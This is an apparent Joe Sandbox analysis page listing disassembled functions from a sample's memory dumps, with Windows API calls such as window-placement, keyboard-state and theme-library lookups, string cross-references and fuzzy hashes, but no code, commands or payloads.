Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Window$ActiveEnabledFocusIconicProc
String ID:
API String ID: 848842217-0
Opcode ID: 561cf7347098f093e6dd9c70c32e186571a8d41a7258d14156b8a540463bd531
Instruction ID: da5c2265a4a58c8c9e6fbf090098cad113a323aa4bf7d7c3c6a40e751a29bc7f
Opcode Fuzzy Hash: 561cf7347098f093e6dd9c70c32e186571a8d41a7258d14156b8a540463bd531
Instruction Fuzzy Hash: 2A311E70744240ABEB54EE68DD88BB9379AEB05B04F0814A5FD04DF796DBA5EC84CB24

Uniqueness

Uniqueness Score: -1.00%

Function 02D518CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 02D5190B
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 02D51929
GetWindowPlacement.USER32(?,0000002C), ref: 02D5195F
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 02D51983

Strings

,, xrefs: 02D5194D

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: d8a3987f020adf0351f28db545d31a88815e9f9e8127ea590ad633f11bf5795f
Instruction ID: 5472f6097d88750a314044cd69cb271a115c069e92e86d2641e09df98e83ddf8
Opcode Fuzzy Hash: d8a3987f020adf0351f28db545d31a88815e9f9e8127ea590ad633f11bf5795f
Instruction Fuzzy Hash: D321DD71A00214ABCF14EFA9D8C4A9AB7A9EF45350F048465FE18DF316D775ED04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D63878 Relevance: 7.6, APIs: 5, Instructions: 62windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 02D6387F
SetActiveWindow.USER32(?,?,?,02D63331,00000000,02D63812), ref: 02D63897

Part of subcall function 02D62F04: EnumWindows.USER32(Function_00052E94,00000000), ref: 02D62F2E
Part of subcall function 02D62F04: ShowOwnedPopups.USER32(00000000,?), ref: 02D62F5D

IsWindowEnabled.USER32(00000000), ref: 02D638C3
SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,02D63331,00000000,02D63812), ref: 02D638F6
DefWindowProcA.USER32(?,00000112,0000F020,00000000,?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,02D63331), ref: 02D6390B

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Window$ActiveEnabledEnumIconicOwnedPopupsProcShowWindows
String ID:
API String ID: 2995439034-0
Opcode ID: 2c7e398858bec2e69d5c676ddd896f902a9fda88ca0a6f1560fdd711fffee07d
Instruction ID: 3d3c3c453a3d696543b490d181a4fb5193e2c63a08e55c0f273f55f305f7dd6e
Opcode Fuzzy Hash: 2c7e398858bec2e69d5c676ddd896f902a9fda88ca0a6f1560fdd711fffee07d
Instruction Fuzzy Hash: 9911DD70600240ABEF54FE68C9C9B6627AAAF08704F4804A5BE44DF75ADB75DC44CF20

Uniqueness

Uniqueness Score: -1.00%

Function 02D3AE94 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

MonitorFromWindow, xrefs: 02D3AEAB

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: MonitorFromWindow
API String ID: 190572456-2842599566
Opcode ID: 0508d3e34a853a00adb0fccba0120bc793be8f555ecca62abebac7912fb8ce00
Instruction ID: e598ec45706806685b0ac442d78315d0ec011f84ccb06d04e866752c64bcdcab
Opcode Fuzzy Hash: 0508d3e34a853a00adb0fccba0120bc793be8f555ecca62abebac7912fb8ce00
Instruction Fuzzy Hash: DF0181B2B001286B9702EB94DC80DFFB79EEB46214F444412F8D1A7B40D7389E41CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 02C044FB Relevance: 6.4, Strings: 5, Instructions: 136COMMON

Download Yara Rule

Strings

:RTT, xrefs: 02C045B4
PRTT, xrefs: 02C0459E
fSTT, xrefs: 02C04588
STT, xrefs: 02C04504
|STT, xrefs: 02C04572

Memory Dump Source

Source File: 00000008.00000003.1648699548.0000000002BAB000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BAB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_2bab000_pointer.jbxd

Similarity

API ID:
String ID: :RTT$PRTT$fSTT$|STT$STT
API String ID: 0-2967419081
Opcode ID: 9ad9d717234059c2c2bfbb70f05a04abbed5e65d918e025e8313b774ed4909a3
Instruction ID: 4f472e97472722b575d0e4255e61358b96f03a922ce3fd2f3a9ca46b6d21502b
Opcode Fuzzy Hash: 9ad9d717234059c2c2bfbb70f05a04abbed5e65d918e025e8313b774ed4909a3
Instruction Fuzzy Hash: 3231F53125954E7FC3138D54EC44B4FBFEFDE46D987A1085AE250DB292C79BE04A82A2

Uniqueness

Uniqueness Score: -1.00%

Function 02D8876A Relevance: 5.1, Strings: 2, Instructions: 2575COMMON

Download Yara Rule

Strings

, xrefs: 02D8AB8E
c, xrefs: 02D8A655

Memory Dump Source

Source File: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID: $c
API String ID: 0-3797896886
Opcode ID: b967fa5f2c03492c02a443886e67412a232a1d2e3eeeb79c24c99ec0061bd16b
Instruction ID: c93fff0b799df57f27d6e4bbbb1a42ba99265268b11ae3433f52f3c208c7042a
Opcode Fuzzy Hash: b967fa5f2c03492c02a443886e67412a232a1d2e3eeeb79c24c99ec0061bd16b
Instruction Fuzzy Hash: 0923BA71A00204AFEB31EF64CC80BBEB7B2EF45704F148559EA89A6781D774AD85CF25

Uniqueness

Uniqueness Score: -1.00%

Function 02D62408 Relevance: 4.5, APIs: 3, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02D62414
GetCursorPos.USER32(?), ref: 02D62431
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 02D62451

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CurrentCursorObjectSingleThreadWait
String ID:
API String ID: 1359611202-0
Opcode ID: 3bcae654b8ee8b88c47ab28ad56d1428f5c5c3e13e553298e4c9b4f09927f6cc
Instruction ID: e94afddfd2eeba383c2a946fee0fa95ef3b95f4e3eefeb0d04aefc5230db9eeb
Opcode Fuzzy Hash: 3bcae654b8ee8b88c47ab28ad56d1428f5c5c3e13e553298e4c9b4f09927f6cc
Instruction Fuzzy Hash: 48F082715043049BDB15E6A9E88DBA973EEEB10314F104562D94187BE0DB76EC80DB66

Uniqueness

Uniqueness Score: -1.00%

Function 02D8BDFF Relevance: 4.2, Strings: 3, Instructions: 464COMMON

Download Yara Rule

Strings

(, xrefs: 02D8C192
(((, xrefs: 02D8C1C2
(, xrefs: 02D8C1A3

Memory Dump Source

Source File: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID: ($($(((
API String ID: 0-2102698497
Opcode ID: 70f26961da04983359bca1248e5d54bef9d1d0e3906da48a8b51b758dccf3dc3
Instruction ID: f0400a094dfe7baddba8ece50872c62e8d06da62bb9497a3a1b26b093c9cc99d
Opcode Fuzzy Hash: 70f26961da04983359bca1248e5d54bef9d1d0e3906da48a8b51b758dccf3dc3
Instruction Fuzzy Hash: BDE1AD31A04105AFEB18EB69CC80B7EB7A6DF85314F14C22AF455EB3D5DA789C418BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02D8D863 Relevance: 3.5, Strings: 2, Instructions: 1000COMMON

Download Yara Rule

Strings

, xrefs: 02D8E20E
@, xrefs: 02D8E626

Memory Dump Source

Source File: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: ef220ad4fc2a88b6fdae843f46c214da83f6911c8539a88788760522f9eb5a8f
Instruction ID: d9cb61a790f3a810bf458e198e8782719fcd286522416c60a9cb36b960ff3d86
Opcode Fuzzy Hash: ef220ad4fc2a88b6fdae843f46c214da83f6911c8539a88788760522f9eb5a8f
Instruction Fuzzy Hash: E372BC70604355AAEF26BF74CC85BAE37A6EF06305F048164FA40A97D1D7B89E41CF29

Uniqueness

Uniqueness Score: -1.00%

Function 02D4F0EC Relevance: 3.1, APIs: 2, Instructions: 97windowCOMMON

Download Yara Rule

APIs

GetMessagePos.USER32 ref: 02D4F0FB
GetKeyboardState.USER32(?,?,?,?,02D4F670), ref: 02D4F1F8

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: KeyboardMessageState
String ID:
API String ID: 3083355189-0
Opcode ID: 53438bd25fd46ab5c6e151262817cda987ac272056d20f91e4dd5d2944d93e4e
Instruction ID: c2820bb51c7c328f0417496bca6722ae13da59dc698e8d8405b6a4c9bb2168dd
Opcode Fuzzy Hash: 53438bd25fd46ab5c6e151262817cda987ac272056d20f91e4dd5d2944d93e4e
Instruction Fuzzy Hash: 5B315C356087819FC724CF38C5857AEBBE5EB89314F004A2AE5D8C6764EB74DD04CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02D50FC4 Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 02D50FFC
GetCapture.USER32 ref: 02D51005

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: 593c53fb64db79c19abc74b4e1909733456d7f909704ad8ff119aca3a288917e
Instruction ID: 4bb447bd02579308ccd1a3bcc8a12e171005331cd5c71a77750a140a585f227f
Opcode Fuzzy Hash: 593c53fb64db79c19abc74b4e1909733456d7f909704ad8ff119aca3a288917e
Instruction Fuzzy Hash: F21130317002559B9F20EB5CC585BA9B3E6EF04384F644065E808EB352DBB6ED45DB51

Uniqueness

Uniqueness Score: -1.00%

Function 02D3344C Relevance: 3.0, APIs: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,02D334E8), ref: 02D3346C
FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,02D334E8), ref: 02D33492

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: be67784ba8161413208514f14c87decf1024773fc4b5a98cf3187807eb0ed4f2
Instruction ID: 6eca0aab5efae6a97d3dc5d368de51f6776bf0f56b9f07b77280774589e96816
Opcode Fuzzy Hash: be67784ba8161413208514f14c87decf1024773fc4b5a98cf3187807eb0ed4f2
Instruction Fuzzy Hash: 8D01F7702443447BE763EB64ED81BD973ADEB18700F5140F5EA48E6780EAB0AD848EB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D18F66 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02D18F89

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: b58d9c46c837297fe7d12c38f73444783084de5736f7e5ba833063f1035045b1
Instruction ID: 9dd247abdfc9ea493d4236be74408635f696790273749823e61c87595811c5c7
Opcode Fuzzy Hash: b58d9c46c837297fe7d12c38f73444783084de5736f7e5ba833063f1035045b1
Instruction Fuzzy Hash: 5D1100B5E00209AF9B00CF99C8809AFF7F9EFC8310F54C569A404E7350E6319E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D1B8D4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D1B8F2

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 37de9f92f173ce7d0e7ba35711fc15005a98ba9205da01c08b5f87b4526e6fe1
Instruction ID: a4c74c336eb203e02d312842abfabb387620957726919eea4610d671018cd807
Opcode Fuzzy Hash: 37de9f92f173ce7d0e7ba35711fc15005a98ba9205da01c08b5f87b4526e6fe1
Instruction Fuzzy Hash: C6E0D87171021837D310A558AC849FA725DDB5C310F00426BBD48C7B44EEA0DD848AF4

Uniqueness

Uniqueness Score: -1.00%

Function 02D1B920 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02D1D08E,00000000,02D1D2A7,?,?,00000000,00000000), ref: 02D1B933

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a755166117e591f0a3c25e14531d3d844bc415e9c08a006e6e203e9a96e080c0
Instruction ID: dc79bbc1d74ceb5e292a5d0836116c705b7a19350c626769206fcda978b47a36
Opcode Fuzzy Hash: a755166117e591f0a3c25e14531d3d844bc415e9c08a006e6e203e9a96e080c0
Instruction Fuzzy Hash: 14D05E6630E2A03AE210915A3E84D7B5ADCDAC57B5F00407AB5C8C6302D200CC06D6B5

Uniqueness

Uniqueness Score: -1.00%

Function 02D2A2F8 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeResource.KERNEL32(?), ref: 02D2A307

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: FreeResource
String ID:
API String ID: 54164923-0
Opcode ID: 23194c2b9c2d3944e4ee37389eeb7092d951211ff739b016f9cd644b4316298d
Instruction ID: 77377319c3657f72f94f98a9ebf70629c114f807423276e7d434fee41b069170
Opcode Fuzzy Hash: 23194c2b9c2d3944e4ee37389eeb7092d951211ff739b016f9cd644b4316298d
Instruction Fuzzy Hash: C2D0A76270093027055072BC398058E938BCE052657044694F180C7790D719CD474BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02D1A31C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02D1A320

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 64ada5efef8ed1c94ae1f9cab26e017eb322887fea06c4bb86efc25537a8397d
Instruction ID: ee6edf193c51e4b55cd5da87f6304e55f7784927237fd7316d3186b0eeac8a77
Opcode Fuzzy Hash: 64ada5efef8ed1c94ae1f9cab26e017eb322887fea06c4bb86efc25537a8397d
Instruction Fuzzy Hash: BCA011008088202282803B282C022383088A800B20FC80B88A8F8803E0EA2EAA2080EB

Uniqueness

Uniqueness Score: -1.00%

Function 02D9E7BC Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

F, xrefs: 02D9E858

Memory Dump Source

Source File: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
Instruction ID: 94e2476a5ee1952b8edbb99463f8a9b5c6e57dcdd67aaf7aaf284bda6327746c
Opcode Fuzzy Hash: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
Instruction Fuzzy Hash: 95513571F142059BEF48CE9DC8907AEB7E7ABC8314F54813AE509E7380EA749E45C754

Uniqueness

Uniqueness Score: -1.00%

Function 02D8CF71 Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d3ea7b5a62d0263bd5a8c0f012e1c092652189da95e11612ec9804777a53492
Instruction ID: ee031c06bc4b984eaba1a82b461f9f5800c6d4497db44870067c9cf6566970a7
Opcode Fuzzy Hash: 1d3ea7b5a62d0263bd5a8c0f012e1c092652189da95e11612ec9804777a53492
Instruction Fuzzy Hash: 88F17C71E10219AFEF04ABA9CC85BEEBBBAEF85310F148154F551F7291C6789D118B70

Uniqueness

Uniqueness Score: -1.00%

Function 02D81D4F Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e72b05c9f72d7b1b0b82fb8626393fb8d2f34d5ddac7137c58889079514876d8
Instruction ID: 0ca83ff656bda62ef463c5a5c6cafa2e9d446c397ddebc610348ec62a959ae46
Opcode Fuzzy Hash: e72b05c9f72d7b1b0b82fb8626393fb8d2f34d5ddac7137c58889079514876d8
Instruction Fuzzy Hash: 86D13A71A043866FDB15EFA49C847AEBBF6EF49300F1480B9E948D2381E7759E15CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02D8BAAC Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b824255cf96ec847ae8711f241e2aba64d2e3cc19cd3ccc37cc53f61f00fa9a
Instruction ID: 0109e1a5f4d6f57059aabd64fd13ebc11975aca35b353d895cf1920657dee672
Opcode Fuzzy Hash: 5b824255cf96ec847ae8711f241e2aba64d2e3cc19cd3ccc37cc53f61f00fa9a
Instruction Fuzzy Hash: 88A1AB31A00505AFEF04EF69C880BAEB7A7EFC5314F188265F455DB799DA789D028A60

Uniqueness

Uniqueness Score: -1.00%

Function 02D12160 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Uniqueness

Uniqueness Score: -1.00%

Function 02D3B738 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme.dll,00000000,02D3BAEB), ref: 02D3B76E
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 02D3B786
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 02D3B798
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 02D3B7AA
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 02D3B7BC
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 02D3B7CE
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 02D3B7E0
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 02D3B7F2
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 02D3B804
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 02D3B816
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 02D3B828
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 02D3B83A
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 02D3B84C
